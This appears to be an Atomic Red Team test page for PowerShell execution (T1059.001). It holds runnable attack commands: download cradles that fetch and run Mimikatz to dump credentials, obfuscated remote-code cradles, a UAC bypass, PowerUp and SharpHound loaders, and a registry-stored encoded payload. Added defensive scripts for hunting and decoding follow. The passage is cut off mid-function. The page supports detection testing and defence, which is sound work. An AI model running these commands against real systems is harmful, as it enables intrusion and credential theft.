T1059.001 - PowerShell


Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).

PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.

A number of PowerShell-based offensive testing tools are available, including Empire, PowerSploit, PoshC2, and PSAttack.(Citation: Github PSAttack)

PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell’s underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Infrastructure (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)

Atomic Tests#

Atomic Test #1 - Mimikatz#

Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed.

Supported Platforms: windows

Elevation Required (e.g. root or admin)

Attack Commands: Run with command_prompt#

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
Invoke-AtomicTest T1059.001 -TestNumbers 1

Atomic Test #2 - Run BloodHound from local disk#

Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If the system is unable to contact a domain, proper execution will not occur.

Successful execution will produce stdout message stating “SharpHound Enumeration Completed”. Upon completion, final output will be a *BloodHound.zip file.

Supported Platforms: windows

Dependencies: Run with powershell!#

Description: SharpHound.ps1 must be located at “PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1”#
Check Prereq Commands:#
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1") {exit 0} else {exit 1}
Get Prereq Commands:#
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
Invoke-AtomicTest T1059.001 -TestNumbers 2 -GetPreReqs

Attack Commands: Run with powershell#

import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
Invoke-AtomicTest T1059.001 -TestNumbers 2

Cleanup:#

Remove-Item $env:Temp\*BloodHound.zip -Force
Invoke-AtomicTest T1059.001 -TestNumbers 2 -Cleanup

Atomic Test #3 - Run Bloodhound from Memory using Download Cradle#

Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to the temp directory. If the system is unable to contact a domain, proper execution will not occur.

Successful execution will produce stdout message stating “SharpHound Enumeration Completed”. Upon completion, final output will be a *BloodHound.zip file.

Supported Platforms: windows

Attack Commands: Run with powershell#

write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
Invoke-AtomicTest T1059.001 -TestNumbers 3

Cleanup:#

Remove-Item $env:Temp\*BloodHound.zip -Force
Invoke-AtomicTest T1059.001 -TestNumbers 3 -Cleanup

Atomic Test #4 - Obfuscation Tests#

Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1t and displays: “SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION”

Supported Platforms: windows

Attack Commands: Run with powershell#

(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
Invoke-AtomicTest T1059.001 -TestNumbers 4

Atomic Test #5 - Mimikatz - Cradlecraft PsSendKeys#

Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.

Supported Platforms: windows

Elevation Required (e.g. root or admin)

Attack Commands: Run with powershell#

$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Invoke-AtomicTest T1059.001 -TestNumbers 5

Atomic Test #6 - Invoke-AppPathBypass#

Note: Windows 10 only. Upon execution windows backup and restore window will be opened.

Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/

Supported Platforms: windows

Attack Commands: Run with command_prompt#

Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
Invoke-AtomicTest T1059.001 -TestNumbers 6

Atomic Test #7 - Powershell MsXml COM object - with prompt#

Powershell MsXml COM object. Not proxy aware; removes the cache, although it does not appear to write to those locations. Upon execution, “Download Cradle test success!” will be displayed.

Provided by mgreen27/mgreen27.github.io

Supported Platforms: windows

Attack Commands: Run with command_prompt#

powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
Invoke-AtomicTest T1059.001 -TestNumbers 7

Atomic Test #8 - Powershell XML requests#

Powershell xml download request. Upon execution, “Download Cradle test success!” will be displayed.

Provided by mgreen27/mgreen27.github.io

Supported Platforms: windows

Attack Commands: Run with command_prompt#

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml');$Xml.command.a.execute | IEX"
Invoke-AtomicTest T1059.001 -TestNumbers 8

Atomic Test #9 - Powershell invoke mshta.exe download#

Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display “Download Cradle test success!”.

Provided by mgreen27/mgreen27.github.io

Supported Platforms: windows

Attack Commands: Run with command_prompt#

C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close()"
Invoke-AtomicTest T1059.001 -TestNumbers 9

Atomic Test #10 - Powershell Invoke-DownloadCradle#

Provided by mgreen27/mgreen27.github.io

Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.

Supported Platforms: windows

Run it with these steps:

1. Open Powershell_ise as a Privileged Account
2. Invoke-DownloadCradle.ps1

Atomic Test #11 - PowerShell Fileless Script Execution#

Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon execution, open “C:\Windows\Temp” and verify that art-marker.txt is in the folder.

Supported Platforms: windows

Attack Commands: Run with powershell#

# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
Invoke-AtomicTest T1059.001 -TestNumbers 11

Cleanup:#

Remove-Item -path C:\Windows\Temp\art-marker.txt -Force -ErrorAction Ignore
Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
Invoke-AtomicTest T1059.001 -TestNumbers 11 -Cleanup

Atomic Test #12 - PowerShell Downgrade Attack#

This test requires the manual installation of PowerShell V2.

Attempts to run PowerShell commands in version 2.0. Reference: https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/

Supported Platforms: windows

Dependencies: Run with powershell!#

Description: PowerShell version 2 must be installed#
Check Prereq Commands:#
if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1}
Get Prereq Commands:#
Write-Host  Automated installer not implemented yet, please install PowerShell v2 manually
Invoke-AtomicTest T1059.001 -TestNumbers 12 -GetPreReqs

Attack Commands: Run with powershell#

powershell.exe -version 2 -Command Write-Host $PSVersion
Invoke-AtomicTest T1059.001 -TestNumbers 12

Atomic Test #13 - NTFS Alternate Data Stream Access#

Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, “Stream Data Executed” will be displayed.

Supported Platforms: windows

Dependencies: Run with powershell!#

Description: Homedrive must be an NTFS drive#
Check Prereq Commands:#
if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1}
Get Prereq Commands:#
Write-Host Prereq's for this test cannot be met automatically

Invoke-AtomicTest T1059.001 -TestNumbers 13 -GetPreReqs

Attack Commands: Run with powershell#

Add-Content -Path $env:TEMP\NTFS_ADS.txt -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path $env:TEMP\NTFS_ADS.txt -Stream 'streamcommand'
Invoke-Expression $streamcommand
Invoke-AtomicTest T1059.001 -TestNumbers 13

Cleanup:#

Remove-Item $env:TEMP\NTFS_ADS.txt -Force -ErrorAction Ignore
Invoke-AtomicTest T1059.001 -TestNumbers 13 -Cleanup
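The defensive counterpart to the test above is finding streams like `NTFS_ADS.txt:streamCommand` before someone executes them. The following is an added example, not part of Atomic Red Team: it walks a directory, lists every named stream on every file, drops the primary `:$DATA` stream and (by default) the benign `Zone.Identifier` mark-of-the-web stream that browsers write, and previews the first line so a stream holding PowerShell stands out. Run it between the attack command and the cleanup to see the stream the test created; the path and the Zone.Identifier exclusion are assumptions for this example.

```powershell
# Added example (not from Atomic Red Team): hunt for alternate data streams under a directory.
function Find-AlternateDataStream {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Path,
        # Zone.Identifier is the normal mark-of-the-web stream; it is noise unless you ask for it.
        [switch]$IncludeZoneIdentifier
    )
    Get-ChildItem -LiteralPath $Path -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            # -Stream * enumerates every stream; ':$DATA' is the file's own (unnamed) data stream.
            Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object {
                    $_.Stream -ne ':$DATA' -and
                    ($IncludeZoneIdentifier -or $_.Stream -ne 'Zone.Identifier')
                } |
                ForEach-Object {
                    [pscustomobject]@{
                        File    = $file.FullName
                        Stream  = $_.Stream
                        Length  = $_.Length
                        # First line of the stream: enough to recognise script content.
                        Preview = Get-Content -LiteralPath $file.FullName -Stream $_.Stream -TotalCount 1 -ErrorAction SilentlyContinue
                    }
                }
        }
}

# After running the attack command above (and before its cleanup) this lists
# NTFS_ADS.txt with stream 'streamCommand' and the Write-Host line as preview.
Find-AlternateDataStream -Path $env:TEMP | Format-Table -AutoSize
```

Streams only exist on NTFS (the test's own prerequisite), so copying a file to FAT/exFAT media or a network share that does not support them silently drops the hidden content; the hunt therefore has to run on the host, not on an exported copy.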

Atomic Test #14 - PowerShell Session Creation and Use#

Connect to a remote powershell session and interact with the host. Upon execution, network test info and ‘T1086 PowerShell Session Creation and Use’ will be displayed.

Supported Platforms: windows

Elevation Required (e.g. root or admin)

Dependencies: Run with powershell!#

Description: PSRemoting must be enabled#
Check Prereq Commands:#
Try {
    New-PSSession -ComputerName $env:COMPUTERNAME -ErrorAction Stop | Out-Null
    exit 0
} 
Catch {
    exit 1
}
Get Prereq Commands:#
Enable-PSRemoting
Invoke-AtomicTest T1059.001 -TestNumbers 14 -GetPreReqs

Attack Commands: Run with powershell#

New-PSSession -ComputerName $env:COMPUTERNAME
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Invoke-AtomicTest T1059.001 -TestNumbers 14

Atomic Test #15 - ATHPowerShellCommandLineParameter -Command parameter variations#

Executes powershell.exe with variations of the -Command parameter.

Supported Platforms: windows

Dependencies: Run with powershell!#

Description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.#
Check Prereq Commands:#
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
Get Prereq Commands:#
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
Invoke-AtomicTest T1059.001 -TestNumbers 15 -GetPreReqs

Attack Commands: Run with powershell#

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation C -Execute -ErrorAction Stop
Invoke-AtomicTest T1059.001 -TestNumbers 15

Atomic Test #16 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments#

Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied.

Supported Platforms: windows

Dependencies: Run with powershell!#

Description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.#
Check Prereq Commands:#
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
Get Prereq Commands:#
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
Invoke-AtomicTest T1059.001 -TestNumbers 16 -GetPreReqs

Attack Commands: Run with powershell#

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation C -UseEncodedArguments -EncodedArgumentsParamVariation EA -Execute -ErrorAction Stop
Invoke-AtomicTest T1059.001 -TestNumbers 16

Atomic Test #17 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations#

Executes powershell.exe with variations of the -EncodedCommand parameter.

Supported Platforms: windows

Dependencies: Run with powershell!#

Description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.#
Check Prereq Commands:#
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
Get Prereq Commands:#
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
Invoke-AtomicTest T1059.001 -TestNumbers 17 -GetPreReqs

Attack Commands: Run with powershell#

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation E -Execute -ErrorAction Stop
Invoke-AtomicTest T1059.001 -TestNumbers 17

Atomic Test #18 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments#

Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied.

Supported Platforms: windows

Dependencies: Run with powershell!#

Description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.#
Check Prereq Commands:#
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
Get Prereq Commands:#
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
Invoke-AtomicTest T1059.001 -TestNumbers 18 -GetPreReqs

Attack Commands: Run with powershell#

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation E -UseEncodedArguments -EncodedArgumentsParamVariation EncodedArguments -Execute -ErrorAction Stop
Invoke-AtomicTest T1059.001 -TestNumbers 18

Atomic Test #19 - PowerShell Command Execution#

Use of obfuscated PowerShell to execute an arbitrary command; outputs “Hello, from PowerShell!”. Example is from the 2021 Threat Detection Report by Red Canary.

Supported Platforms: windows

Attack Commands: Run with command_prompt#

powershell.exe -e  JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==
Invoke-AtomicTest T1059.001 -TestNumbers 19
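Tests #15 through #19 all lean on `-EncodedCommand` and its abbreviations, and the first triage step for any of them is the same: pull the base64 off the command line and decode it as UTF-16LE (not UTF-8, which is the usual mistake and yields interleaved nulls). The function below is an added example, not from Atomic Red Team or Red Canary; it accepts any prefix of `-EncodedCommand` that powershell.exe itself accepts, decodes the payload, and checks the result against a small, assumed set of indicator patterns. The input is the command line from Test #19 above, so the output also shows the limit of static decoding: the decoded script builds `iex` at run time from `'ie{0}' -f 'x'`, so an `iex` pattern never fires on the decoded text.

```powershell
# Added example (not from Atomic Red Team): decode a powershell.exe -EncodedCommand payload
# found on a command line and report which indicator patterns the decoded script matches.
function ConvertFrom-EncodedCommandLine {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$CommandLine)

    # powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
    # with either '-' or '/' as the switch character; the base64 blob may be quoted.
    $pattern = '(?i)(?:^|\s)[-/](?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedco|encodedcom|encodedcomm|encodedcomma|encodedcomman|encodedcommand)\s+(["'']?)([A-Za-z0-9+/=]+)\1'
    if ($CommandLine -match $pattern) {
        # The payload is base64 over UTF-16LE; [Text.Encoding]::Unicode is UTF-16LE in .NET.
        $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2]))
    } else {
        return $null
    }

    # Assumed indicator set for this example; a real ruleset would be larger.
    $indicators = @{
        'iex'             = '(?i)\biex\b|Invoke-Expression'
        'download cradle' = '(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|XmlHttp|BitsTransfer'
        'string assembly' = '"\s*\+\s*"|-f\s+'        # "Wr"+"it"  or  ('ie{0}' -f 'x')
        'gcm lookup'      = '(?i)\bgcm\b|Get-Command'  # resolving a cmdlet by name at run time
    }
    $hits = foreach ($name in $indicators.Keys) {
        if ($decoded -match $indicators[$name]) { $name }
    }
    [pscustomobject]@{
        Decoded    = $decoded
        Indicators = @($hits | Sort-Object)
    }
}

# Constructed input: the exact command line from Atomic Test #19.
$cmd = 'powershell.exe -e  JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA=='
$result = ConvertFrom-EncodedCommandLine -CommandLine $cmd
$result.Decoded      # & (gcm ('ie{0}' -f 'x')) ("Wr"+"it"+"e-H"+"ost 'H"+"el"+"lo, fr"+"om P"+"ow"+"erS"+"h"+"ell!'")
$result.Indicators   # gcm lookup, string assembly  (note: no 'iex' hit; it only exists at run time)
```

The resolved form (`iex`, `Write-Host`) is only visible once the engine has evaluated the format string and the concatenation, which is what script block logging (EID 4104) records and what a command-line-only detection never sees; decode on the command line to triage, but alert on the 4104 text.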

Atomic Test #20 - PowerShell Invoke Known Malicious Cmdlets#

PowerShell execution of known malicious PowerShell cmdlets.

Supported Platforms: windows

Elevation Required (e.g. root or admin)

Attack Commands: Run with powershell#

$malcmdlets = "Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord"

foreach ($cmdlets in $malcmdlets) {
    "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
    $cmdlets}
Invoke-AtomicTest T1059.001 -TestNumbers 20

Atomic Test #21 - PowerUp Invoke-AllChecks#

Check for privilege escalation paths using PowerUp from PowerShellMafia.

Supported Platforms: windows

Attack Commands: Run with powershell#

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
Invoke-AtomicTest T1059.001 -TestNumbers 21

Atomic Test #22 - Abuse Nslookup with DNS Records#

Red teamers avoid IEX and Invoke-WebRequest in their PowerShell commands. Instead, host a TXT record with a payload to compromise hosts.

reference

Supported Platforms: windows

Attack Commands: Run with powershell#

# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup  { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Invoke-AtomicTest T1059.001 -TestNumbers 22

Detection#

If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.

Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)
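The paragraph above, and the earlier note that the engine can be driven through System.Management.Automation without powershell.exe, both come down to one question: which processes have that assembly loaded right now? The function below is an added example, not from MITRE or Atomic Red Team. It enumerates live processes, keeps those with `System.Management.Automation.dll` (or its NGEN image `System.Management.Automation.ni.dll`) mapped, and flags any whose image name is not in a short allow-list of expected hosts. The allow-list is an assumption for this example and needs tuning per estate.

```powershell
# Added example (not from MITRE/Atomic Red Team): point-in-time hunt for processes that
# host the PowerShell engine. $KnownHost is an assumed allow-list; extend it for your environment.
function Get-PowerShellHostProcess {
    [CmdletBinding()]
    param(
        [string[]]$KnownHost = @('powershell', 'powershell_ise', 'pwsh', 'wsmprovhost', 'sqlps', 'ServerManager')
    )
    foreach ($p in Get-Process) {
        try {
            # Reading .Modules throws for protected processes and for processes of the other
            # bitness; skip those instead of aborting the sweep (run as admin, 64-bit, for best coverage).
            $engine = @($p.Modules | Where-Object {
                $_.ModuleName -match '^System\.Management\.Automation(\.ni)?\.dll$' })
        } catch { continue }
        if ($engine.Count -eq 0) { continue }
        [pscustomobject]@{
            ProcessId  = $p.Id
            Name       = $p.ProcessName
            Path       = $p.Path
            EnginePath = $engine[0].FileName
            Expected   = ($p.ProcessName -in $KnownHost)
        }
    }
}

# Anything not expected is a candidate for unmanaged PowerShell (PowerPick-style loaders,
# C# hosts calling System.Management.Automation directly).
Get-PowerShellHostProcess | Where-Object { -not $_.Expected } | Format-Table -AutoSize
```

This is a snapshot and misses short-lived hosts; for continuous coverage the same condition is expressed as an image-load event (Sysmon Event ID 7 on ImageLoaded ending in `System.Management.Automation.dll` where Image is not one of the expected hosts), and the EID 400 HostApplication field discussed below gives a third, engine-side view of the same thing.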

It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.

Consider monitoring for Windows event ID (EID) 400, which shows the version of PowerShell executing in the EngineVersion field (which may also be relevant to detecting a potential Downgrade Attack) as well as if PowerShell is running locally or remotely in the HostName field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.(Citation: inv_ps_attacks)
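To make the EID 400 guidance concrete, and to give Test #12 (the downgrade) a matching detection, here is an added example, not from MITRE or Atomic Red Team. The message body of EID 400 in the classic "Windows PowerShell" log is a list of `Key=Value` lines; the function parses them and flags three things: `EngineVersion` starting with `2.` (a downgrade, which also means no script block logging or AMSI), `HostName` of `ServerRemoteHost` (a remoting session rather than a local console), and a `HostApplication` whose image is not powershell.exe, powershell_ise.exe or pwsh.exe (the engine hosted elsewhere). The two sample messages are constructed for the example in the EID 400 layout, not real log exports; the live query at the end reads the actual log.

```powershell
# Added example (not from MITRE/Atomic Red Team): triage EID 400 "Engine state is changed" messages.
function Get-PSEngineStart {
    [CmdletBinding()]
    param([Parameter(Mandatory, ValueFromPipeline)][string]$Message)
    process {
        # Collect the Key=Value lines from the Details block.
        $fields = @{}
        foreach ($m in [regex]::Matches($Message, '(?m)^\s*(\w+)=(.*?)\s*$')) {
            $fields[$m.Groups[1].Value] = $m.Groups[2].Value
        }
        $engine   = [string]$fields['EngineVersion']
        $hostName = [string]$fields['HostName']
        $app      = [string]$fields['HostApplication']

        # HostApplication is the host's raw command line; its first token (quoted or not) is the image.
        $image = if ($app -match '^"([^"]+)"') { $Matches[1] } else { ($app -split '\s+', 2)[0] }
        $image = [IO.Path]::GetFileName($image)

        $flags = @()
        if ($engine -match '^2\.')            { $flags += 'downgrade: engine 2.0 (no script block logging, no AMSI)' }
        if ($hostName -eq 'ServerRemoteHost') { $flags += 'remote session (PSRemoting/WinRM)' }
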